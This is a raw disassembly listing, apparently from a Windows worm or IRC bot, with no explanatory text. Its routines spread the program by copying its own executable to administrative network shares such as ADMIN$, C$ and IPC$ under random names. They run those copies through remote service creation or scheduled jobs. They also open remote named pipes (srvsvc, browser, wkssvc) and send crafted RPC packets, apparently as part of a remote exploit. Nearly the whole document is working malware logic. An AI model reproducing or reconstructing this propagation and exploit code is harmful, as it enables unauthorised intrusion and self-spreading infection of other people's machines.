var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_CC = dword ptr 0D4h
arg_D4 = dword ptr 0DCh
arg_DC = dword ptr 0E4h
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
push edi
call sub_41F76B
xor ebx, ebx
push 20h
lea eax, [ebp+var_FC]
push ebx
push eax
call sub_4221F0
mov eax, [ebp+arg_8]
add esp, 0Ch
mov [ebp+var_E8], eax
lea eax, [ebp+var_FC]
push ebx
mov [ebp+var_F8], 1
push [ebp+arg_0]
mov [ebp+var_EC], ebx
mov [ebp+var_E0], ebx
push [ebp+arg_4]
push eax
call dword_4543BC
test eax, eax
jnz loc_4135D4
mov [ebp+var_DC], offset byte_44D6A4
mov [ebp+var_D8], offset aAdmin_1 ; "ADMIN$"
mov [ebp+var_D4], offset aIpc ; "IPC$"
mov [ebp+var_D0], offset aPrint ; "PRINT$"
mov [ebp+var_CC], offset aS_7 ; "S$"
mov [ebp+var_C8], offset aNetlogon ; "NETLOGON$"
mov [ebp+var_C4], offset aB_1 ; "B$"
mov [ebp+var_C0], offset aC_1 ; "C$"
mov [ebp+var_BC], offset aD_0 ; "D$"
mov [ebp+var_B8], offset aE_1 ; "E$"
mov [ebp+var_B4], offset aF_0 ; "F$"
mov [ebp+var_B0], offset aG_0 ; "G$"
mov [ebp+var_AC], offset asc_43D800 ; "H$"
mov [ebp+var_A8], offset aI_2 ; "I$"
mov [ebp+var_A4], offset aJ_0 ; "J$"
mov [ebp+var_A0], offset aK_1 ; "K$"
mov [ebp+var_9C], offset asc_43D7F0 ; "L$"
mov [ebp+var_98], offset aM_3 ; "M$"
mov [ebp+var_94], offset aN_1 ; "N$"
mov [ebp+var_90], offset aO_1 ; "O$"
mov [ebp+var_8C], offset aP_4 ; "P$"
mov [ebp+var_88], offset aQ_1 ; "Q$"
mov [ebp+var_84], offset aR_0 ; "R$"
mov [ebp+var_80], offset aT_0 ; "T$"
mov [ebp+var_7C], offset aU_1 ; "U$"
mov [ebp+var_78], offset aV_1 ; "V$"
mov [ebp+var_74], offset aW_0 ; "W$"
mov [ebp+var_70], offset asc_43D7C8 ; "X$"
mov [ebp+var_6C], offset aY_0 ; "Y$"
mov [ebp+var_68], offset aZ_4 ; "Z$"
mov [ebp+var_64], offset aCWindows ; "C:\\WINDOWS$"
mov [ebp+var_60], offset aGuest ; "GUEST$"
mov [ebp+var_5C], offset aCWinnt ; "C:\\WINNT$"
mov [ebp+var_58], offset aCWinntSystem32 ; "C:\\WINNT\\system32$"
mov [ebp+var_54], offset aCWindowsSystem ; "C:\\WINDOWS\\system32$"
mov [ebp+var_50], offset aDWinnt ; "D:\\WINNT$"
mov [ebp+var_4C], offset aDWindows ; "D:\\WINDOWS$"
mov [ebp+var_48], offset aSeclogon ; "SECLOGON$"
mov [ebp+var_44], offset aSystem_1 ; "SYSTEM$"
mov [ebp+var_40], offset aWindows_0 ; "WINDOWS$"
mov [ebp+var_3C], offset aWinnt_0 ; "WINNT$"
mov [ebp+var_38], offset aSql_0 ; "SQL$"
mov [ebp+var_34], offset aMysql_0 ; "MYSQL$"
mov [ebp+var_30], offset aMssql_0 ; "MSSQL$"
mov [ebp+var_2C], offset aIis ; "IIS$"
mov [ebp+var_28], offset aDrivec ; "drivec$"
mov [ebp+var_24], offset aFtp_0 ; "FTP$"
mov [ebp+var_20], offset aDownloads ; "DOWNLOADS$"
mov [ebp+var_1C], offset aSysvol ; "SYSVOL$"
mov [ebp+var_18], offset aLpt1 ; "LPT1$"
mov [ebp+var_14], offset aSita ; "SITA$"
mov [ebp+var_10], offset aClients ; "clients$"
mov [ebp+var_C], ebx
call sub_4220FC
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
push offset loc_43903C
mov esi, offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
lea eax, [ebp+var_300]
push esi
push eax
call sub_422063
add esp, 20h
lea eax, [ebp+var_404]
push 104h
push eax
push ebx
call dword_42F074 ; GetModuleHandleA
push eax
call dword_42F154 ; GetModuleFileNameA
mov [ebp+var_4], ebx
mov ebx, offset aSSS_1 ; "%s\\%s\\%s"
loc_41336F: ; CODE XREF: sub_4130E5+3AC�j
mov eax, [ebp+var_4]
lea ecx, [ebp+var_300]
push ecx
mov eax, [ebp+eax*4+var_DC]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_8]
push ebx
push eax
call sub_422063
add esp, 14h
lea eax, [ebp+var_200]
push eax
call dword_42F0A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_4133B8
lea eax, [ebp+var_200]
push 80h
push eax
call dword_42F08C ; SetFileAttributesA
loc_4133B8: ; CODE XREF: sub_4130E5+2BF�j
lea eax, [ebp+var_200]
push 0
push eax
lea eax, [ebp+var_404]
push eax
call dword_42F09C ; CopyFileA
test eax, eax
mov [ebp+var_8], eax
jnz loc_4134A1
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 5
jnz loc_41348A
lea eax, [ebp+var_200]
push 0
push eax
call sub_424450
pop ecx
test eax, eax
pop ecx
jnz loc_41348A
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
lea eax, [ebp+var_300]
push edx
push offset loc_43903C
push esi
push eax
call sub_422063
lea eax, [ebp+var_300]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_DC]
lea eax, [ebp+var_200]
push [ebp+arg_8]
push ebx
push eax
call sub_422063
add esp, 34h
lea eax, [ebp+var_200]
push 0
push eax
lea eax, [ebp+var_404]
push eax
call dword_42F09C ; CopyFileA
test eax, eax
mov [ebp+var_8], eax
jnz short loc_4134A1
loc_41348A: ; CODE XREF: sub_4130E5+2FD�j
; sub_4130E5+315�j
inc [ebp+var_4]
cmp [ebp+var_4], 35h
jb loc_41336F
cmp [ebp+var_8], 0
jz loc_4135D2
loc_4134A1: ; CODE XREF: sub_4130E5+2EE�j
; sub_4130E5+3A3�j
mov eax, [ebp+var_4]
lea ecx, [ebp+var_300]
push ecx
push [ebp+arg_4]
mov eax, [ebp+eax*4+var_DC]
mov [ebp+var_4], eax
push [ebp+arg_0]
push [ebp+arg_8]
push eax
call sub_412EB7
add esp, 14h
test eax, eax
jz loc_413582
mov ebx, offset aSSSSSSCreateds ; "%s %s: -> [%s\\%s, %s/%s] (CreatedServic"...
loc_4134D4: ; CODE XREF: sub_4130E5+4B7�j
cmp [ebp+arg_DC], 0
mov esi, [ebp+arg_CC]
mov edi, offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
jz short loc_413528
push offset byte_44D6A4
push [ebp+arg_4]
call sub_422760
pop ecx
test eax, eax
pop ecx
mov eax, offset aBlank ; "(Blank)"
jz short loc_413503
mov eax, [ebp+arg_4]
loc_413503: ; CODE XREF: sub_4130E5+419�j
push eax
lea eax, [esi+esi*8]
push [ebp+arg_0]
lea eax, ds:432069h[eax*8]
push [ebp+var_4]
push [ebp+arg_8]
push eax
push edi
push ebx
push [ebp+arg_C]
push [ebp+arg_10]
call sub_4104F6
add esp, 24h
loc_413528: ; CODE XREF: sub_4130E5+401�j
cmp [ebp+arg_D4], 0
jz short loc_413571
push offset byte_44D6A4
push [ebp+arg_4]
call sub_422760
pop ecx
test eax, eax
pop ecx
mov eax, offset aBlank ; "(Blank)"
jz short loc_41354C
mov eax, [ebp+arg_4]
loc_41354C: ; CODE XREF: sub_4130E5+462�j
push eax
lea eax, [esi+esi*8]
push [ebp+arg_0]
lea eax, ds:432069h[eax*8]
push [ebp+var_4]
push [ebp+arg_8]
push eax
push edi
push ebx
push [ebp+arg_C]
push [ebp+arg_10]
call sub_410491
add esp, 24h
loc_413571: ; CODE XREF: sub_4130E5+44A�j
lea eax, [esi+esi*8]
xor ebx, ebx
lea eax, ds:432090h[eax*8]
inc dword ptr [eax]
inc ebx
jmp short loc_4135D4
; ---------------------------------------------------------------------------
loc_413582: ; CODE XREF: sub_4130E5+3E4�j
lea eax, [ebp+var_300]
push eax
push [ebp+arg_8]
call sub_413024
pop ecx
test eax, eax
pop ecx
jz short loc_4135A1
mov ebx, offset aSSSSSSNetsched ; "%s %s: -> [%s\\%s, %s/%s] (NetSchedJobAd"...
jmp loc_4134D4
; ---------------------------------------------------------------------------
loc_4135A1: ; CODE XREF: sub_4130E5+4B0�j
lea eax, [ebp+var_200]
push eax
call dword_42F0A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_4135C5
lea eax, [ebp+var_200]
push 80h
push eax
call dword_42F08C ; SetFileAttributesA
loc_4135C5: ; CODE XREF: sub_4130E5+4CC�j
lea eax, [ebp+var_200]
push eax
call dword_42F088 ; DeleteFileA
loc_4135D2: ; CODE XREF: sub_4130E5+3B6�j
xor ebx, ebx
loc_4135D4: ; CODE XREF: sub_4130E5+5A�j
; sub_4130E5+49B�j
push 1
push 1
push [ebp+arg_8]
call dword_454374
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn
sub_4130E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4135E8 proc near ; CODE XREF: .text:00413779�p
; .text:004137F6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
cmp off_43C950, 0
push ebx
push esi
push edi
jz short loc_413636
mov eax, offset off_43C950
mov ebx, eax
loc_4135FE: ; CODE XREF: sub_4135E8+4C�j
sub esp, 0D0h
lea esi, [ebp+arg_10]
push 34h
pop ecx
mov edi, esp
push [ebp+arg_C]
rep movsd
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
push [ebp+arg_0]
call sub_4130E5
add esp, 0E4h
cmp eax, 1
jz short loc_41363D
add ebx, 4
mov eax, ebx
cmp dword ptr [ebx], 0
jnz short loc_4135FE
loc_413636: ; CODE XREF: sub_4135E8+D�j
xor eax, eax
loc_413638: ; CODE XREF: sub_4135E8+58�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41363D: ; CODE XREF: sub_4135E8+42�j
xor eax, eax
inc eax
jmp short loc_413638
sub_4135E8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 62Ch
push ebx
push esi
lea eax, [ebp+10h]
push edi
push eax
lea eax, [ebp-30h]
xor ebx, ebx
push offset aS_8 ; "\\\\%s"
push eax
mov [ebp-4], ebx
mov [ebp-14h], ebx
mov [ebp-1Ch], ebx
mov [ebp-18h], ebx
call sub_422063
add esp, 0Ch
lea eax, [ebp-62Ch]
push 3E8h
push eax
lea eax, [ebp-30h]
push 0FFFFFFFFh
push eax
push ebx
push ebx
call dword_42F098 ; MultiByteToWideChar
lea eax, [ebp-30h]
mov [ebp-40h], ebx
push eax
lea eax, [ebp-118h]
push offset aSIpc ; "%s\\IPC$"
push eax
mov [ebp-34h], ebx
mov [ebp-4Ch], ebx
call sub_422063
lea eax, [ebp-118h]
add esp, 0Ch
mov [ebp-3Ch], eax
mov eax, offset byte_44D6A4
push ebx
push eax
push eax
lea eax, [ebp-50h]
push eax
call dword_4543BC
test eax, eax
jz short loc_4136E2
push 1
lea eax, [ebp-118h]
push ebx
push eax
call dword_454374
xor eax, eax
jmp loc_413816
; ---------------------------------------------------------------------------
loc_4136E2: ; CODE XREF: .text:004136C9�j
; .text:004137B0�j
lea eax, [ebp-18h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-14h]
push eax
lea eax, [ebp-4]
push 0FFFFFFFFh
push eax
push 2
lea eax, [ebp-62Ch]
push ebx
push eax
call dword_45425C
mov [ebp-0Ch], eax
push 1
lea eax, [ebp-118h]
push ebx
push eax
call dword_454374
cmp [ebp-0Ch], ebx
jz short loc_413725
cmp dword ptr [ebp-0Ch], 0EAh
jnz short loc_413798
loc_413725: ; CODE XREF: .text:0041371A�j
mov eax, [ebp-4]
cmp eax, ebx
mov [ebp-10h], eax
jz short loc_4137A9
cmp [ebp-14h], ebx
mov [ebp-8], ebx
jbe short loc_413798
loc_413737: ; CODE XREF: .text:00413796�j
mov eax, [ebp-10h]
cmp eax, ebx
jz short loc_413798
push ebx
push ebx
lea ecx, [ebp-244h]
push 12Ch
push ecx
push 0FFFFFFFFh
push dword ptr [eax]
push ebx
push ebx
call dword_42F0A4 ; WideCharToMultiByte
sub esp, 0D0h
lea eax, [ebp-30h]
lea esi, [ebp+10h]
push 34h
pop ecx
mov edi, esp
push dword ptr [ebp+0Ch]
rep movsd
push dword ptr [ebp+8]
push eax
lea eax, [ebp-244h]
push eax
call sub_4135E8
add esp, 0E0h
cmp eax, 1
jz short loc_413798
add dword ptr [ebp-10h], 4
inc dword ptr [ebp-8]
mov eax, [ebp-8]
cmp eax, [ebp-14h]
jb short loc_413737
loc_413798: ; CODE XREF: .text:00413723�j
; .text:00413735�j ...
cmp [ebp-4], ebx
jz short loc_4137A9
push dword ptr [ebp-4]
call dword_4543A0
mov [ebp-4], ebx
loc_4137A9: ; CODE XREF: .text:0041372D�j
; .text:0041379B�j
cmp dword ptr [ebp-0Ch], 0EAh
jz loc_4136E2
cmp [ebp-4], ebx
jz short loc_4137C4
push dword ptr [ebp-4]
call dword_4543A0
loc_4137C4: ; CODE XREF: .text:004137B9�j
cmp dword ptr [ebp-0Ch], 5
jnz short loc_413813
cmp off_43C880, ebx
jz short loc_413813
mov eax, offset off_43C880
mov [ebp-8], eax
loc_4137DA: ; CODE XREF: .text:00413811�j
sub esp, 0D0h
lea esi, [ebp+10h]
push 34h
pop ecx
mov edi, esp
push dword ptr [ebp+0Ch]
rep movsd
push dword ptr [ebp+8]
lea ecx, [ebp-30h]
push ecx
push dword ptr [eax]
call sub_4135E8
add esp, 0E0h
cmp eax, 1
jz short loc_413813
mov eax, [ebp-8]
add eax, 4
mov [ebp-8], eax
cmp [eax], ebx
jnz short loc_4137DA
loc_413813: ; CODE XREF: .text:004137C8�j
; .text:004137D0�j ...
xor eax, eax
inc eax
loc_413816: ; CODE XREF: .text:004136DD�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41381B: ; DATA XREF: .text:00432010�o
jmp $+5
mov eax, dword_43D884
add eax, 6
mov dword_455A9C, eax
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41382E proc near ; CODE XREF: sub_41382E+D0�p
; sub_41391C+666�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_413842
or [ebp+arg_7], 1
jmp short loc_413846
; ---------------------------------------------------------------------------
loc_413842: ; CODE XREF: sub_41382E+C�j
and [ebp+arg_7], 0FEh
loc_413846: ; CODE XREF: sub_41382E+12�j
mov ecx, [ebp+arg_24]
mov ebx, [ebp+arg_20]
movzx eax, cx
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_41386A
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_41387C
; ---------------------------------------------------------------------------
loc_41386A: ; CODE XREF: sub_41382E+26�j
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_C], cx
mov [ebp+arg_14], eax
mov [ebp+arg_2B], 1
loc_41387C: ; CODE XREF: sub_41382E+3A�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_422F79
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_413915
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_4223F0
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call dword_42F07C ; WriteFile
test eax, eax
jz short loc_41390C
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_41390C
push [ebp+arg_20]
call sub_4230B3
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_413908
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_41382E
add esp, 2Ch
jmp short loc_413917
; ---------------------------------------------------------------------------
loc_413908: ; CODE XREF: sub_41382E+B3�j
mov al, 1
jmp short loc_413917
; ---------------------------------------------------------------------------
loc_41390C: ; CODE XREF: sub_41382E+9C�j
; sub_41382E+A4�j
push [ebp+arg_20]
call sub_4230B3
pop ecx
loc_413915: ; CODE XREF: sub_41382E+61�j
xor al, al
loc_413917: ; CODE XREF: sub_41382E+D8�j
; sub_41382E+DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_41382E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41391C proc near ; CODE XREF: .text:00414084�p
var_60E0 = byte ptr -60E0h
var_40E0 = byte ptr -40E0h
var_20E0 = byte ptr -20E0h
var_E0 = byte ptr -0E0h
var_DC = byte ptr -0DCh
var_DB = byte ptr -0DBh
var_DA = byte ptr -0DAh
var_D9 = byte ptr -0D9h
var_D8 = dword ptr -0D8h
var_D4 = word ptr -0D4h
var_D2 = word ptr -0D2h
var_D0 = dword ptr -0D0h
var_CC = word ptr -0CCh
var_CA = word ptr -0CAh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = word ptr -0C0h
var_BE = byte ptr -0BEh
var_BC = byte ptr -0BCh
var_AC = dword ptr -0ACh
var_A8 = byte ptr -0A8h
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = word ptr -84h
var_80 = byte ptr -80h
var_70 = dword ptr -70h
var_6C = qword ptr -6Ch
var_64 = byte ptr -64h
var_50 = dword ptr -50h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_42 = byte ptr -42h
var_41 = byte ptr -41h
var_40 = dword ptr -40h
var_3A = word ptr -3Ah
var_38 = dword ptr -38h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_8 = byte ptr 10h
arg_C0 = dword ptr 0C8h
arg_D8 = dword ptr 0E0h
push ebp
mov ebp, esp
mov eax, 60E0h
call sub_4220C0
push ebx
push esi
push edi
lea eax, [ebp+arg_8]
push offset a__0 ; "."
push eax
call sub_424380
pop ecx
xor ebx, ebx
test eax, eax
pop ecx
mov edi, offset byte_44D6A4
mov esi, 2000h
jz short loc_413986
lea eax, [ebp+arg_8]
push eax
push offset aSPipe ; "\\\\%s\\pipe"
lea eax, [ebp+var_20E0]
push esi
push eax
call sub_42219B
push 20h
lea eax, [ebp+var_64]
push ebx
push eax
call sub_4221F0
add esp, 1Ch
lea eax, [ebp+var_20E0]
mov [ebp+var_50], eax
lea eax, [ebp+var_64]
push ebx
push edi
push edi
push eax
call sub_421C72
loc_413986: ; CODE XREF: sub_41391C+2E�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeSrvsvc ; "\\\\%s\\pipe\\srvsvc"
lea eax, [ebp+var_40E0]
push esi
push eax
call sub_42219B
add esp, 10h
lea eax, [ebp+var_40E0]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_42F060 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov dword ptr [ebp+var_C+4], eax
jnz loc_413B78
lea eax, [ebp+arg_8]
push offset a__0 ; "."
push eax
call sub_424380
pop ecx
test eax, eax
pop ecx
jz short loc_413A16
lea eax, [ebp+arg_8]
push eax
push offset aSPipe ; "\\\\%s\\pipe"
lea eax, [ebp+var_20E0]
push esi
push eax
call sub_42219B
push 20h
lea eax, [ebp+var_64]
push ebx
push eax
call sub_4221F0
add esp, 1Ch
lea eax, [ebp+var_20E0]
mov [ebp+var_50], eax
lea eax, [ebp+var_64]
push ebx
push edi
push edi
push eax
call sub_421C72
loc_413A16: ; CODE XREF: sub_41391C+BE�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeBrowser_0 ; "\\\\%s\\pipe\\browser"
lea eax, [ebp+var_40E0]
push esi
push eax
call sub_42219B
add esp, 10h
lea eax, [ebp+var_40E0]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_42F060 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov dword ptr [ebp+var_C+4], eax
jnz loc_413B78
lea eax, [ebp+arg_8]
push offset a__0 ; "."
push eax
call sub_424380
pop ecx
test eax, eax
pop ecx
jz short loc_413AA6
lea eax, [ebp+arg_8]
push eax
push offset aSPipe ; "\\\\%s\\pipe"
lea eax, [ebp+var_20E0]
push esi
push eax
call sub_42219B
push 20h
lea eax, [ebp+var_64]
push ebx
push eax
call sub_4221F0
add esp, 1Ch
lea eax, [ebp+var_20E0]
mov [ebp+var_50], eax
lea eax, [ebp+var_64]
push ebx
push edi
push edi
push eax
call sub_421C72
loc_413AA6: ; CODE XREF: sub_41391C+14E�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeWkssvc ; "\\\\%s\\pipe\\wkssvc"
lea eax, [ebp+var_40E0]
push esi
push eax
call sub_42219B
add esp, 10h
lea eax, [ebp+var_40E0]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_42F060 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov dword ptr [ebp+var_C+4], eax
jnz loc_413B78
lea eax, [ebp+arg_8]
push offset a__0 ; "."
push eax
call sub_424380
pop ecx
test eax, eax
pop ecx
jz short loc_413B36
lea eax, [ebp+arg_8]
push eax
push offset loc_438FF8
lea eax, [ebp+var_20E0]
push esi
push eax
call sub_42219B
push 20h
lea eax, [ebp+var_64]
push ebx
push eax
call sub_4221F0
add esp, 1Ch
lea eax, [ebp+var_20E0]
mov [ebp+var_50], eax
lea eax, [ebp+var_64]
push ebx
push edi
push edi
push eax
call sub_421C72
loc_413B36: ; CODE XREF: sub_41391C+1DE�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeTrkwks ; "\\\\%s\\pipe\\trkwks"
lea eax, [ebp+var_40E0]
push esi
push eax
call sub_42219B
add esp, 10h
lea eax, [ebp+var_40E0]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_42F060 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov dword ptr [ebp+var_C+4], eax
jz loc_41403F
loc_413B78: ; CODE XREF: sub_41391C+A6�j
; sub_41391C+136�j ...
push 48h
lea eax, [ebp+var_DC]
push ebx
push eax
call sub_4221F0
push 10h
xor edi, edi
pop eax
inc edi
mov [ebp+var_D8], eax
push eax
lea eax, [ebp+var_BC]
push offset dword_43C858
push eax
mov [ebp+var_DC], 5
mov [ebp+var_DB], bl
mov [ebp+var_DA], 0Bh
mov [ebp+var_D9], 3
mov [ebp+var_D4], 48h
mov [ebp+var_D2], bx
mov [ebp+var_D0], ebx
mov [ebp+var_CC], 10B8h
mov [ebp+var_CA], 10B8h
mov [ebp+var_C8], ebx
mov [ebp+var_C4], edi
mov [ebp+var_C0], bx
mov [ebp+var_BE], 1
call sub_4223F0
push 10h
lea eax, [ebp+var_A8]
push offset dword_43C844
push eax
mov [ebp+var_AC], 3
call sub_4223F0
add esp, 24h
lea eax, [ebp+var_E0]
mov [ebp+var_98], 2
push ebx
push eax
lea eax, [ebp+var_DC]
push 48h
push eax
push dword ptr [ebp+var_C+4]
call dword_42F07C ; WriteFile
test eax, eax
jz loc_413D36
lea eax, [ebp+var_10]
push ebx
push eax
lea eax, [ebp+var_60E0]
push esi
push eax
push dword ptr [ebp+var_C+4]
call dword_42F054 ; ReadFile
push ebx
call sub_4241D4
push eax
call sub_4220EF
push 14h
lea eax, [ebp+var_94]
push 41h
push eax
call sub_4221F0
push 1Ch
lea eax, [ebp+var_2C]
push 41h
push eax
call sub_4221F0
add esp, 20h
call sub_4220FC
mov esi, [ebp+arg_D8]
mov [ebp+var_94], eax
mov [ebp+var_88], edi
mov [ebp+var_8C], ebx
lea esi, [esi+esi*4]
mov [ebp+var_90], edi
shl esi, 2
mov [ebp+var_84], bx
cmp byte_43D86C[esi], bl
jz short loc_413CD7
push 4
mov [ebp+var_20], edi
mov [ebp+var_28], edi
push offset dword_455610
jmp short loc_413CEF
; ---------------------------------------------------------------------------
loc_413CD7: ; CODE XREF: sub_41391C+3AA�j
cmp byte_43D86D[esi], bl
jz short loc_413CFE
push 2
pop eax
push 4
mov [ebp+var_20], eax
mov [ebp+var_28], eax
push offset loc_43C83C
loc_413CEF: ; CODE XREF: sub_41391C+3B9�j
lea eax, [ebp+var_1C]
mov [ebp+var_24], ebx
push eax
call sub_4223F0
add esp, 0Ch
loc_413CFE: ; CODE XREF: sub_41391C+3C1�j
call sub_4220FC
mov edi, 0FAh
cdq
mov ecx, edi
idiv ecx
inc edx
mov [ebp+var_2C], edx
call sub_4220FC
cdq
idiv edi
mov eax, dword_43D860[esi]
mov [ebp+var_14], ebx
push eax
mov [ebp+var_4], eax
inc edx
mov [ebp+var_18], edx
call sub_422F79
mov edi, eax
pop ecx
cmp edi, ebx
jnz short loc_413D44
loc_413D36: ; CODE XREF: sub_41391C+32C�j
push dword ptr [ebp+var_C+4]
call dword_42F038 ; CloseHandle
jmp loc_41403F
; ---------------------------------------------------------------------------
loc_413D44: ; CODE XREF: sub_41391C+418�j
mov eax, [ebp+var_4]
add eax, 0FFFFFFFEh
push eax
push 90h
push edi
call sub_4221F0
mov eax, [ebp+var_4]
push 2
push ebx
lea eax, [edi+eax-2]
push eax
call sub_4221F0
mov eax, dword_43D868[esi]
push 7
add eax, edi
push offset dword_43D854
push eax
mov [ebp+arg_D8], eax
call sub_4223F0
push dword_43D888
mov eax, [ebp+arg_D8]
add eax, 7
push offset dword_432980
push eax
call sub_4223F0
mov eax, dword_43D864[esi]
add esp, 30h
cmp byte_43D86C[esi], bl
mov [ebp+arg_D8], eax
jz short loc_413E0E
push 4
add eax, edi
push offset dword_455A9C
push eax
call sub_4223F0
add [ebp+arg_D8], 0Ch
mov esi, offset dword_43D884
mov eax, [ebp+arg_D8]
push 4
add eax, edi
push esi
push eax
call sub_4223F0
mov eax, [ebp+arg_D8]
push 4
push esi
lea eax, [eax+edi+24h]
push eax
mov [ebp+arg_D8], eax
call sub_4223F0
mov eax, [ebp+arg_D8]
push 4
add eax, 0Ch
push esi
push eax
call sub_4223F0
add esp, 30h
jmp short loc_413E47
; ---------------------------------------------------------------------------
loc_413E0E: ; CODE XREF: sub_41391C+494�j
cmp byte_43D86D[esi], bl
jz short loc_413E47
add eax, edi
mov dword ptr [ebp+var_C], 10h
mov [ebp+arg_D8], eax
mov esi, offset dword_43D884
loc_413E2A: ; CODE XREF: sub_41391C+529�j
push 4
push esi
push [ebp+arg_D8]
call sub_4223F0
add [ebp+arg_D8], 4
add esp, 0Ch
dec dword ptr [ebp+var_C]
jnz short loc_413E2A
loc_413E47: ; CODE XREF: sub_41391C+4F0�j
; sub_41391C+4F8�j
mov eax, [ebp+var_4]
add eax, 42h
push eax
call sub_422F79
mov esi, eax
pop ecx
cmp esi, ebx
mov dword ptr [ebp+var_C], esi
jnz short loc_413E72
push dword ptr [ebp+var_C+4]
call dword_42F038 ; CloseHandle
push edi
call sub_4230B3
pop ecx
jmp loc_41403F
; ---------------------------------------------------------------------------
loc_413E72: ; CODE XREF: sub_41391C+53F�j
mov eax, [ebp+var_4]
add eax, 42h
push eax
push ebx ; double
push esi
call sub_4221F0
lea eax, [ebp+var_94]
push 14h
push eax
push esi
